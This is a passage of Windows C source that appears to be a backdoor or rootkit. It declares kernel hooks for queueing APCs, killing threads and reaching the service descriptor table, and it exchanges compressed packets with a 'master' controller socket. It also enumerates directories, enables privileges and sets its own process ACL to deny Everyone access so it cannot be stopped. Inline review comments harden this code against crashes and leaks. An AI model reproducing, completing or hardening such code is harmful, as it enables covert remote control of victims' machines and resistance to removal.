IN SIZE_T NumberOfBytes,
IN ULONG Tag
);
/* Function-pointer variables named after ntoskrnl exports (ExFreePool,
 * KeInitializeApc, ZwCreateFile, ...). Nothing in this view assigns them;
 * presumably they are resolved at run time elsewhere in the file — confirm
 * against the initialisation code before relying on any of them being
 * non-NULL. The first declaration of the run (pfnExAllocatePoolWithTag or
 * similar) starts above this view. */
VOID
(NTAPI *pfnExFreePool)(
IN PVOID P
);
PKTHREAD
(NTAPI *pfnKeGetCurrentThread)(
);
VOID
(NTAPI *pfnKeInitializeApc)(
IN PRKAPC Apc,
IN PRKTHREAD Thread,
IN KAPC_ENVIRONMENT Environment,
IN PKKERNEL_ROUTINE KernelRoutine,
IN PKRUNDOWN_ROUTINE RundownRoutine OPTIONAL,
IN PKNORMAL_ROUTINE NormalRoutine OPTIONAL,
IN KPROCESSOR_MODE ProcessorMode OPTIONAL,
IN PVOID NormalContext OPTIONAL
);
BOOLEAN
(NTAPI *pfnKeInsertQueueApc)(
IN PRKAPC Apc,
IN PVOID SystemArgument1,
IN PVOID SystemArgument2,
IN LONG Increment
);
BOOLEAN
(NTAPI *pfnPsGetVersion)(
PULONG MajorVersion OPTIONAL,
PULONG MinorVersion OPTIONAL,
PULONG BuildNumber OPTIONAL,
PUNICODE_STRING CSDVersion OPTIONAL
);
HANDLE
(NTAPI *pfnPsGetCurrentProcessId)(
);
NTSTATUS
(NTAPI *pfnPsLookupThreadByThreadId)(
IN PVOID UniqueThreadId,
OUT PETHREAD *Thread
);
NTSTATUS
(NTAPI *pfnPsTerminateSystemThread)(
IN NTSTATUS ExitStatus
);
NTSTATUS
(NTAPI *pfnZwClose)(
IN HANDLE Handle
);
NTSTATUS
(NTAPI*pfnZwCreateFile)(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER AllocationSize OPTIONAL,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PVOID EaBuffer OPTIONAL,
IN ULONG EaLength
);
/* Pointers to kernel-side globals (object types, the service descriptor
 * table, the build number). Same caveat: not initialised in this view. */
POBJECT_TYPE *pobPsThreadType;
PServiceDescriptorTableEntry *pobKeServiceDescriptorTable;
ULONG *pobNtBuildNumber;
POBJECT_TYPE *pobIoFileObjectType;
/* Forward declarations; the definitions are presumably later in the file.
 * PRING0_ROUTINE, PRING0_KILLTHREAD and PRING0_OPENFILE are project types
 * declared outside this view. */
BOOL APIENTRY DllMain(HANDLE, DWORD, LPVOID);
VOID APIENTRY EntryPoint();
void RecordToFile(PCHAR lpName, LPVOID lpBuffer, ULONG nLength);
NTSTATUS Ring0Call(IN PRING0_ROUTINE Ring0Routine, IN PVOID Ring0Argument);
NTSTATUS Ring0KillThread(IN PRING0_KILLTHREAD ThreadArgument);
NTSTATUS Ring0OpenFile(IN OUT PRING0_OPENFILE FileArgument);
BOOLEAN EnumAllThreads(IN ULONG UniqueProcessId, OUT PRING0_KILLTHREAD ThreadId);
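#ifdef _DEBUG
/* Debug-only helper: expand a printf-style format into a local buffer and
 * hand it to OutputDebugString. Output longer than the buffer is truncated
 * instead of overrunning it (the original used unbounded vsprintf).
 * vsnprintf is C99 / MSVC 2015+; older MSVC spells it _vsnprintf and does not
 * guarantee NUL-termination on truncation, hence the explicit terminator. */
void PrintDebugString(PCHAR pFormat, ...)
{
    CHAR info[1024];
    va_list pArg;
    va_start(pArg, pFormat);
    vsnprintf(info, sizeof info, pFormat, pArg);
    va_end(pArg);
    info[sizeof info - 1] = '\0';
    OutputDebugString(info);
}
/* DbgPrint((fmt, ...)) — note the double parentheses; expands to nothing in
 * release builds. */
#define DbgPrint(_string) PrintDebugString _string
#else
#define DbgPrint(_string)
#endif
/* Debug-only software breakpoint that is harmless when no debugger is
 * attached (the int 3 exception is swallowed). Expands to nothing in
 * release builds. MSVC-specific syntax (__asm, __try). */
#ifdef _DEBUG
#define BREAKPOINT __try {__asm int 3} __except (EXCEPTION_EXECUTE_HANDLER) {}
#else
#define BREAKPOINT
#endif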
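/* Append one record to %WINDIR%\ntshell.log: a local timestamp and the event
 * id, then FormatString[iFormat] expanded with the variadic arguments, then
 * CRLF. Does nothing unless FLAG_RECORD_ERROR is set in ConfigFlags.
 * The log handle is opened lazily on first use and kept open for the life
 * of the process (it is never closed). ConfigFlags, FormatString and
 * FLAG_RECORD_ERROR are defined elsewhere in the file; iFormat is not range
 * checked against FormatString here — callers pass literal ids (1..23 in
 * this view).
 * Changes from the original: the event text is formatted with a bound
 * (vsnprintf) instead of vsprintf into the 1024-byte buffer, the
 * GetWindowsDirectory result is checked before strcat, and the file
 * position is set with FILE_END rather than GetFileSize + FILE_BEGIN.
 * WriteFile results are still not checked (best-effort logging). */
void LogEvent(int iFormat, ...)
{
    static HANDLE log = INVALID_HANDLE_VALUE;
    CHAR info[1024];
    SYSTEMTIME stime;
    va_list pArg;
    ULONG temp;
    int length;
    PCHAR pFormat;
    UINT dirLen;
    if (!(ConfigFlags & FLAG_RECORD_ERROR))
        return;
    pFormat = FormatString[iFormat];
    if (log == INVALID_HANDLE_VALUE)
    {
        /* 500 of the 1024 bytes leaves ample room for "\ntshell.log".
         * A return of 0 is failure; >= 500 means the buffer was too small. */
        dirLen = GetWindowsDirectory(info, 500);
        if (dirLen == 0 || dirLen >= 500)
            return;
        strcat(info, "\\ntshell.log");
        log = CreateFile( info,
                          GENERIC_WRITE | GENERIC_READ,
                          FILE_SHARE_READ,
                          NULL,
                          OPEN_ALWAYS,
                          FILE_ATTRIBUTE_NORMAL,
                          NULL);
        if (log == INVALID_HANDLE_VALUE)
            return;
        SetFilePointer(log, 0, NULL, FILE_END); /* append after existing records */
    }
    GetLocalTime(&stime);
    /* Fixed-width prefix; far below the buffer size. */
    length = sprintf( info,
                      "[%02d/%02d/%02d,%02d:%02d:%02d] EventId:%04d ",
                      stime.wMonth,
                      stime.wDay,
                      stime.wYear,
                      stime.wHour,
                      stime.wMinute,
                      stime.wSecond,
                      iFormat);
    if (length > 0)
        WriteFile(log, info, (DWORD)length, &temp, NULL); /* timestamp */
    va_start(pArg, iFormat);
    /* vsnprintf: C99 / MSVC 2015+ (older MSVC: _vsnprintf). Returns the
     * length the full text would have had; clamp to what was written. */
    length = vsnprintf(info, sizeof info, pFormat, pArg);
    va_end(pArg);
    if (length < 0)
        return;
    if ((size_t)length >= sizeof info)
        length = (int)sizeof info - 1; /* truncated; write what fits */
    WriteFile(log, info, (DWORD)length, &temp, NULL); /* event text */
    WriteFile(log, "\r\n", 2, &temp, NULL); /* line terminator */
}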
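/* Send " <str>\r\n" on socket s. The line is built in a fixed 300-byte local
 * buffer; a str too long for it is truncated but still terminated with CRLF
 * (the original used unbounded sprintf and could overrun the buffer).
 * The send() result is not checked, as in the original. Assumes an ANSI
 * build (TCHAR == char), which the original's sprintf already required.
 * snprintf is C99 / MSVC 2015+; older MSVC spells it _snprintf and may not
 * NUL-terminate on truncation, which the explicit terminator covers. */
void SendToClient(SOCKET s, char *str)
{
    TCHAR info[300];
    int n = snprintf(info, sizeof info, " %s\r\n", str);
    if (n < 0)
        return;
    if ((size_t)n >= sizeof info)
    {
        /* Truncated: keep a complete line for the receiver. */
        info[sizeof info - 3] = '\r';
        info[sizeof info - 2] = '\n';
        info[sizeof info - 1] = '\0';
    }
    send(s, info, (int)strlen(info), 0);
}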
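/* Send exactly len bytes from buf on s, retrying on partial sends.
 * Returns 0 on success, -1 if send() reports SOCKET_ERROR or returns 0 —
 * the original loops treated a 0 return as progress and would spin forever
 * on it. A len <= 0 sends nothing and succeeds. */
static int SendAllToMaster(SOCKET s, const char *buf, int len)
{
    int done = 0;
    while (done < len)
    {
        int ret = send(s, buf + done, len - done, 0);
        if (ret == SOCKET_ERROR || ret == 0)
            return -1;
        done += ret;
    }
    return 0;
}
/* Send one type-0 packet to master_sock: a PACK_TYPE_1 header
 * (dwPackType = 0, nPackSize = length) followed by length bytes of buffer.
 * Returns length on success. On a send failure the peer address is logged
 * as event 1 and -1 is returned; the getpeername() result itself is not
 * checked, as in the original. */
int SendToMaster(SOCKET master_sock, char *buffer, int length)
{
    struct sockaddr_in name;
    int namelen = sizeof(name);
    PACK_TYPE_1 pack;
    pack.dwPackType = 0;
    pack.nPackSize = length;
    if (SendAllToMaster(master_sock, (const char *)&pack, (int)sizeof(PACK_TYPE_1)) < 0 ||
        SendAllToMaster(master_sock, buffer, length) < 0)
    {
        getpeername(master_sock, (struct sockaddr *)&name, &namelen);
        LogEvent(1, inet_ntoa(name.sin_addr));
        return -1;
    }
    return length;
}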
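/* Receive exactly len bytes from s into buf, retrying on short reads.
 * Returns 0 on success. On SOCKET_ERROR it logs event 2, on an orderly
 * close (recv() == 0) event 3, each with the peer address, and returns -1. */
static int RecvAllFromMaster(SOCKET s, char *buf, int len)
{
    struct sockaddr_in name;
    int namelen = sizeof(name);
    int done = 0;
    while (done < len)
    {
        int ret = recv(s, buf + done, len - done, 0);
        if (ret == SOCKET_ERROR || ret == 0)
        {
            getpeername(s, (struct sockaddr *)&name, &namelen);
            LogEvent(ret == 0 ? 3 : 2, inet_ntoa(name.sin_addr));
            return -1;
        }
        done += ret;
    }
    return 0;
}
/* Read one type-0 packet from master_sock: a PACK_TYPE_1 header followed by
 * nPackSize bytes of payload.
 *   buffer: if length != -1, *buffer is a caller-owned buffer of at least
 *           length bytes; if length == -1, *buffer is set to a HeapAlloc'd
 *           block of nPackSize bytes that the caller must HeapFree.
 * Returns the payload size, or -1 after logging the peer address with
 * event 2 (recv error), 3 (peer closed), 4 (payload does not fit) or
 * 23 (dwPackType != 0).
 * nPackSize is read off the wire and is untrusted: a value that does not
 * fit a non-negative int is rejected (event 4) before it is used as an
 * allocation or loop bound, and a block allocated here is released again
 * if the payload read fails (the original leaked it and left *buffer
 * dangling). On the length == -1 path the int range is the only bound on
 * the allocation; no maximum packet size is defined in this view. */
int RecvFromMaster(SOCKET master_sock, char **buffer, int length)
{
    struct sockaddr_in name;
    int namelen = sizeof(name);
    PACK_TYPE_1 pack;
    BOOL allocated = FALSE;
    int size;
    if (RecvAllFromMaster(master_sock, (char *)&pack, (int)sizeof(PACK_TYPE_1)) < 0)
        return -1;
    if (pack.dwPackType != 0)
    {
        getpeername(master_sock, (struct sockaddr *)&name, &namelen);
        LogEvent(23, inet_ntoa(name.sin_addr));
        return -1;
    }
    size = (int)pack.nPackSize;
    if (size < 0 || (length != -1 && size > length))
    {
        getpeername(master_sock, (struct sockaddr *)&name, &namelen);
        LogEvent(4, inet_ntoa(name.sin_addr));
        return -1;
    }
    if (length == -1)
    {
        *buffer = HeapAlloc(GetProcessHeap(), 0, (SIZE_T)size);
        if (*buffer == NULL)
            return -1;
        allocated = TRUE;
    }
    if (RecvAllFromMaster(master_sock, *buffer, size) < 0)
    {
        if (allocated)
        {
            HeapFree(GetProcessHeap(), 0, *buffer);
            *buffer = NULL;
        }
        return -1;
    }
    return size;
}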
/* Convenience form of RecvFromMaster for a caller-owned buffer: passes the
 * buffer through a local pointer so that RecvFromMaster's char ** interface
 * is satisfied. Returns whatever RecvFromMaster returns (payload size or -1).
 * Do not pass length == -1 here: RecvFromMaster would then allocate into the
 * local pointer, which is discarded on return. */
int RecvFromMaster1(SOCKET master_sock, char *buffer, int length)
{
    char *dest = buffer;
    int received = RecvFromMaster(master_sock, &dest, length);
    return received;
}
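/* Compress length bytes of buffer with Lz77Compress, wrap the result in a
 * PACK_TYPE_2 header (dwPackType 1, bCompressed, not encrypted, CRC32 of the
 * compressed bytes, original and packed sizes) and send the whole packet on
 * master_sock. Returns 0 on success, -1 on allocation or send failure.
 * The packet buffer is freed on every path (the original leaked it when
 * send() failed), and a 0 return from send() is treated as failure rather
 * than looping forever.
 * NOTE(review): the output allocation of length + length/8 + header assumes
 * Lz77Compress never expands its input by more than 1/8 — confirm against
 * Lz77Compress; an overrun here is a heap overflow. */
int CompressAndSendPack(SOCKET master_sock, PVOID buffer, DWORD length)
{
    PPACK_TYPE_2 pack;
    int sent, total, ret, result = -1;
    pack = (PPACK_TYPE_2)HeapAlloc(GetProcessHeap(), 0, length + length / 8 + sizeof(PACK_TYPE_2));
    if (pack == NULL)
        return -1;
    pack->dwPackType = 1;
    pack->bCompressed = TRUE;
    pack->bEncrypted = FALSE;
    pack->nOriginalSize = length;
    pack->nPackSize = Lz77Compress(pack->bPackData, buffer, length, 2);
    pack->dwCrc32 = crc32(0, pack->bPackData, pack->nPackSize);
    total = (int)(pack->nPackSize + sizeof(PACK_TYPE_2));
    for (sent = 0; sent < total; sent += ret)
    {
        ret = send(master_sock, ((char *)pack) + sent, total - sent, 0);
        if (ret == SOCKET_ERROR || ret == 0)
            goto Cleanup; /* result stays -1 */
    }
    result = 0;
Cleanup:
    HeapFree(GetProcessHeap(), 0, pack);
    return result;
}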
/*
VOID EnumDirectoryTree(LPTSTR Path, PENUMFILE_CALLBACK CallbackRoutine, PVOID CallbackArgument)
{
WIN32_FIND_DATA wfd;
TCHAR szFullPath[MAX_PATH];
HANDLE hFindStack[256];
LPTSTR pPathStack[256];
DWORD depth = 0;
strcpy(szFullPath, Path);
pPathStack[depth] = strchr(szFullPath, '\\');
if (pPathStack[depth] == NULL || pPathStack[depth][1] != '\0')
strcat(szFullPath, "\\");
pPathStack[depth] = strrchr(szFullPath, '\\') + 1;
for (;;)
{
SearchDirectory:
strcpy(pPathStack[depth], "*.*"); //枚举全部文件
hFindStack[depth] = FindFirstFile(szFullPath, &wfd);
pPathStack[depth][0] = '\0';
if (hFindStack[depth] != INVALID_HANDLE_VALUE)
{
do
{
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
if (!strcmp(wfd.cFileName, ".") || !strcmp(wfd.cFileName, "..")) //忽略当前目录和上一级目录
continue;
strcpy(pPathStack[depth], wfd.cFileName); //枚举下一级目录
strcat(pPathStack[depth], "\\");
depth++;
pPathStack[depth] = strrchr(szFullPath, '\\') + 1;
goto SearchDirectory;
}
if (!CallbackRoutine(szFullPath, &wfd, CallbackArgument)) //返回文件给调用者
{
do
{
FindClose(hFindStack[depth]); //不继续查找,释放资源并退出
} while (depth--);
return;
}
ReSearchDirectory:
;
} while (FindNextFile(hFindStack[depth], &wfd));
FindClose(hFindStack[depth]);
}
if (depth == 0)
break;
depth--; //后退到上一级目录
pPathStack[depth] = '\0';
goto ReSearchDirectory;
}
}//*/
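/* Recursively enumerate the directory Path, calling
 * CallbackRoutine(directory, &wfd, CallbackArgument) for every entry except
 * "." and "..". A subdirectory is walked before it is itself reported.
 * The callback returns FALSE to stop the whole walk; that is the only case
 * in which this function returns FALSE. It returns TRUE otherwise, including
 * when Path cannot be opened or a path would exceed MAX_PATH (such subtrees
 * are skipped).
 * Fixes relative to the original: bContinue was returned uninitialised when
 * FindFirstFile failed; a stop requested inside a nested call was ignored
 * by the caller; strcpy/strcat into the MAX_PATH buffer had no bound.
 * Assumes an ANSI build (TCHAR == char), as the original's str* calls did. */
BOOLEAN EnumDirectoryTree(LPTSTR Path, PENUMFILE_CALLBACK CallbackRoutine, PVOID CallbackArgument)
{
    WIN32_FIND_DATA wfd;
    TCHAR szFullPath[MAX_PATH];
    HANDLE hFind;
    LPTSTR pPath;
    size_t dirLen;
    BOOLEAN bContinue = TRUE;
    /* Path + "\\*.*" + NUL must fit the buffer. */
    if (strlen(Path) + 5 > MAX_PATH)
        return TRUE;
    strcpy(szFullPath, Path);
    pPath = strchr(szFullPath, '\\');
    if (pPath == NULL || pPath[1] != '\0')
        strcat(szFullPath, "\\*.*");
    else
        strcat(szFullPath, "*.*"); /* Path already ends in a separator (e.g. "C:\") */
    pPath = strrchr(szFullPath, '\\') + 1; /* where entry names are spliced in */
    dirLen = (size_t)(pPath - szFullPath);
    hFind = FindFirstFile(szFullPath, &wfd);
    pPath[0] = '\0'; /* szFullPath is now the directory prefix handed to the callback */
    if (hFind == INVALID_HANDLE_VALUE)
        return TRUE;
    do
    {
        if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
        {
            if (!strcmp(wfd.cFileName, ".") || !strcmp(wfd.cFileName, ".."))
                continue; /* skip the current and parent directory entries */
            /* Descend only if prefix + name + NUL fits; the nested call
             * re-checks for its own "\\*.*" suffix. */
            if (dirLen + strlen(wfd.cFileName) < MAX_PATH)
            {
                strcpy(pPath, wfd.cFileName);
                bContinue = EnumDirectoryTree(szFullPath, CallbackRoutine, CallbackArgument);
                pPath[0] = '\0';
                if (!bContinue)
                    break;
            }
        }
        bContinue = CallbackRoutine(szFullPath, &wfd, CallbackArgument); /* report the entry */
        if (!bContinue)
            break;
    } while (FindNextFile(hFind, &wfd));
    FindClose(hFind);
    return bContinue;
}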
//调整当前进程特权
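/* Enable (bEnable != FALSE) or disable the named privilege on the current
 * process token. Returns TRUE only if the privilege was actually adjusted:
 * AdjustTokenPrivileges returns TRUE even when the token does not hold the
 * privilege and sets the last error to ERROR_NOT_ALL_ASSIGNED, which the
 * original reported as success. The token handle is closed on every path
 * after it is opened. */
BOOL EnablePrivilege(LPCTSTR lpPrivilegeName, BOOL bEnable)
{
    HANDLE hToken;
    BOOL bResult;
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
    if (!LookupPrivilegeValue(NULL, lpPrivilegeName, &tp.Privileges[0].Luid))
        return FALSE;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
        return FALSE;
    bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
    /* Read the last error before CloseHandle can overwrite it. */
    if (bResult && GetLastError() == ERROR_NOT_ALL_ASSIGNED)
        bResult = FALSE;
    CloseHandle(hToken);
    return bResult;
}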
//调整当前进程的访问控制列表,禁止外部进程访问
BOOL ModifyProcessAcl()
{
SID_IDENTIFIER_AUTHORITY sia = SECURITY_WORLD_SID_AUTHORITY;
PSID pSid = NULL;
HANDLE hToken = NULL;
DWORD dwReturnLength;
LPVOID pTokenInformation = NULL;
PTOKEN_USER pTokenUser;
DWORD cbAcl;
PACL pAcl = NULL;
BOOL bResult = FALSE;
if (!AllocateAndInitializeSid(&sia, 1, 0, 0, 0, 0, 0, 0, 0, 0, &pSid)) //取得 Everyone 的SID
return FALSE;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
goto Cleanup;
GetTokenInformation(hToken, TokenUser, NULL, 0, &dwReturnLength);
pTokenInformation = LocalAlloc(LPTR, dwReturnLength);
if (pTokenInformation == NULL)
goto Cleanup;
if (!GetTokenInformation(hToken, TokenUser, pTokenInformation, dwReturnLength, &dwReturnLength))
goto Cleanup;
pTokenUser = (PTOKEN_USER)pTokenInformation;
cbAcl = sizeof(ACL) + 7 * (sizeof(ACCESS_DENIED_ACE) - sizeof(DWORD)) + GetLengthSid(pSid);
pAcl = LocalAlloc(LPTR, cbAcl);
if (pAcl == NULL)
goto Cleanup;
if (!InitializeAcl(pAcl, cbAcl, ACL_REVISION)) //初始化一个空的ACL
goto Cleanup;
if (!AddAccessDeniedAce(pAcl, ACL_REVISION, -1, pSid)) //拒绝 Everyone 全部权限
goto Cleanup;
// if (!AddAccessAllowedAce(pAcl, ACL_REVISION, 0, pTokenUser->User.Sid))
// goto Cleanup;
if (SetSecurityInfo( GetCurrentProcess(),
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION | 0x80000000L, //PROTECTED_DACL_SECURITY_INFORMATION
NULL,
NULL,
pAcl,
NULL) == ERROR_SUCCESS) //修改进程ACL
{
bResult = TRUE;
}
Cleanup:
if (pAcl != NULL)